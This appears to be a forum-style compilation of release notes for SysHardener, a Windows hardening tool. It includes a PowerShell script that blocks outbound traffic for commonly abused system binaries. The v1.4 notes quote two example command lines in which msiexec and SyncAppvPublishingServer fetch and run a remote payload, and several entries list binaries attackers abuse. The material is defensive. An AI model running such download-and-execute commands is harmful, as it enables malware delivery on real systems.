SysHardener

http://www.novirusthanks.org/products/syshardener/ 

For Windows Vista, 7, 8, 10 (32\64-bit)

This free security tool helps you harden Windows settings to mitigate online threats. You can enable UAC (commonly disabled by malware), unassociate bad file types (e.g. JS, VBS, VBE, WSH), disable autorun.inf on removable devices, enable DEP and SEH on all programs, turn off Windows Script Host (Wscript.exe), turn on SmartScreen, disable unneeded Windows services, disable Javascript on Adobe Reader, disable macros\OLE\Activex on Office, disable Javascript on Foxit Reader, block outbound connections of commonly hijacked system programs (e.g. powershell.exe, wscript.exe, winword.exe) via Windows Firewall rules, and much more. All these system hardening tweaks can help mitigate today's common threats. Especially useful are the Windows Firewall rules that block outbound connections of powershell, wscript, mshta, winword, excel, etc., so an exploit cannot download the remote payload.

https://www.wilderssecurity.com/threads/syshardener-harden-windows-settings.401092/ 

 

SysHardener v1.5 Released:

http://www.novirusthanks.org/products/syshardener/

+ Updated Help\FAQs file
+ Added new command-line parameter: /customsettings "C:\Path\To\Settings.ini"
+ Removed button "Un\Select All" -> Use the "Tweaks" menu in the top main menu
+ Added option "Save to .INI file" on "Tweaks" main menu
+ Added option "Load from .INI file" on "Tweaks" main menu
+ New option Block Outbound Connections for Cmstp.exe (checked)
+ New option Block Outbound Connections for Esentutl.exe (checked)
+ New option Block Outbound Connections for Extrac32.exe (checked)
+ New option Block Outbound Connections for Expand.exe (unchecked)
+ New option Block Outbound Connections for Makecab.exe (checked)
+ New option Block Outbound Connections for Pcalua.exe (checked)
+ New option Block Outbound Connections for Print.exe (unchecked)
+ New option Block Outbound Connections for Replace.exe (unchecked)
+ New option Block Outbound Connections for ScriptRunner.exe (checked)
+ New option Block Outbound Connections for Scrcons.exe (checked)
+ New option Block Outbound Connections for Ftp.exe (unchecked)
+ New option Block Outbound Connections for Tftp.exe (unchecked)
+ New option Block Outbound Connections for Telnet.exe (unchecked)
+ Improved detection of Acrobat Reader 11.0

SysHardener v1.4 Released.

http://www.novirusthanks.org/products/syshardener/

Here is the changelog:

+ New option "Block Outbound Connections for SyncAppvPublishing.exe" (checked)
+ New option "Block Outbound Connections for Certutil.exe" (checked)
+ New option "Block Outbound Connections for Msiexec.exe" (unchecked)
+ New option "Block Outbound Connections for Odbcconf.exe" (checked)
+ New option "Block Outbound Connections for AtBroker.exe" (checked)
+ "Block Outbound Connections for Csrss.exe" is checked
+ Added button "Windows Updates" on "System Tools" tab
+ Move progress bar after asking-for\creating restore point
+ Updated help file

Just a quick update to mitigate:

CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV
https://www.bleepingcomputer.com/ne...ckers-to-download-malware-while-bypassing-av/
* Tweak: "Block Outbound Connections for Certutil.exe"

Msiexec.exe could allow attackers to download and execute a remote payload
Example: cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"
* Tweak: "Block Outbound Connections for Msiexec.exe"

SyncAppvPublishing.exe could allow attackers to download and execute a remote payload
Example: SyncAppvPublishingServer.exe ".; *DownloadFile() or DownloadString() or Start-Process mshta.exe hxxp://127.0.0.1/payload.hta"
* Tweak: "Block Outbound Connections for SyncAppvPublishingServer.exe"
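
The outbound-block mitigation described above can also be applied and audited by hand with the built-in NetSecurity cmdlets. This is an added example, not SysHardener's own code and not necessarily how the tool implements the tweak; it assumes Windows 8 or later, an elevated PowerShell session, and uses a rule group name and rule display names made up for the example.

```powershell
#Requires -RunAsAdministrator
param([switch]$IncludeUnchecked)   # also block the entries the changelog leaves unchecked

# Binaries and their default state as listed in the v1.4 changelog above.
$Targets = [ordered]@{
    'SyncAppvPublishingServer.exe' = $true
    'certutil.exe'                 = $true
    'msiexec.exe'                  = $false   # "unchecked" in the changelog
    'odbcconf.exe'                 = $true
    'AtBroker.exe'                 = $true
}

$Group = 'Example-OutboundBlock'   # constructed group label, used for auditing/removal
$Dirs  = "$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64"

foreach ($exe in $Targets.Keys) {
    if (-not $Targets[$exe] -and -not $IncludeUnchecked) { continue }

    # Firewall rules match on the full image path, so the 32-bit copy
    # under SysWOW64 needs its own rule when it exists.
    foreach ($dir in $Dirs) {
        $path = Join-Path $dir $exe
        if (-not (Test-Path -LiteralPath $path)) { continue }

        $name = "Block outbound - $path"   # constructed display name
        # Idempotent: do not create a duplicate if the rule is already present.
        if (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue) { continue }

        New-NetFirewallRule -DisplayName $name -Group $Group `
            -Direction Outbound -Action Block -Program $path -Profile Any | Out-Null
    }
}

# Audit: list every rule in the group with the program it applies to.
Get-NetFirewallRule -Group $Group -ErrorAction SilentlyContinue | ForEach-Object {
    [pscustomobject]@{
        Program = ($_ | Get-NetFirewallApplicationFilter).Program
        Enabled = $_.Enabled
        Action  = $_.Action
    }
} | Format-Table -AutoSize
```

Windows Firewall allows outbound traffic by default and block rules take precedence over allow rules, so each listed binary needs an explicit block entry. Because the rules share one group, Remove-NetFirewallRule -Group 'Example-OutboundBlock' removes them all.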
 

SysHardener v1.3 Released.

Released SysHardener v1.3:
http://www.novirusthanks.org/products/syshardener/

Changelog:

+ New option "Disable Loading of DLLs via AppInit_DLLs"
+ New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
+ New option "Disable Windows Subsystem for Linux"
+ Improved "Disable PowerShell v2.0 Engine"
+ Added more "blue" icons that can be clicked to get more info
+ Some "orange" icons can be clicked to get more info
+ Reduced height of the main application window
+ Main application window is sizeable and can be maximized
+ Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
+ Minor fixes and optimizations
+ Updated help file

SysHardener v1.1 Released.

Here is the changelog:

+ Fixed tweaks related to Foxit Reader
+ Fixed "Set Macros Security to "Very High" in Kingsoft WPS Office"
+ Enabled "Turn Off WinHTTP Web Proxy Auto-Discovery Service":
*** References: Project Zero: aPAColypse now: Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript
+ Added an "info" icon that opens a web page when clicked
+ Ask to create a system restore point
+ Support parameter "/createrestorepoint" from command-line
+ New option "Disable PowerShell Script Execution (Windows 7+)"
+ New option "Restrict PowerShell (v3+) to Constrained Language Mode"
+ New option "Configure Behavior of UAC Prompt for Administrators"
+ New option "Configure Behavior of UAC Prompt for Users"
+ Added "System Tools" tab to open useful system tools
+ Minor fixes and optimizations
+ Updated help file

https://www.ghacks.net/2018/02/26/harden-windows-pcs-with-syshardener/

SysHardener is a tweaking software that focuses on security almost exclusively. Run it to make dozens of changes to Windows in a matter of minutes.

While you can make all the changes by yourself, you'd spend more time doing so especially if you don't harden systems all day long as part of your job.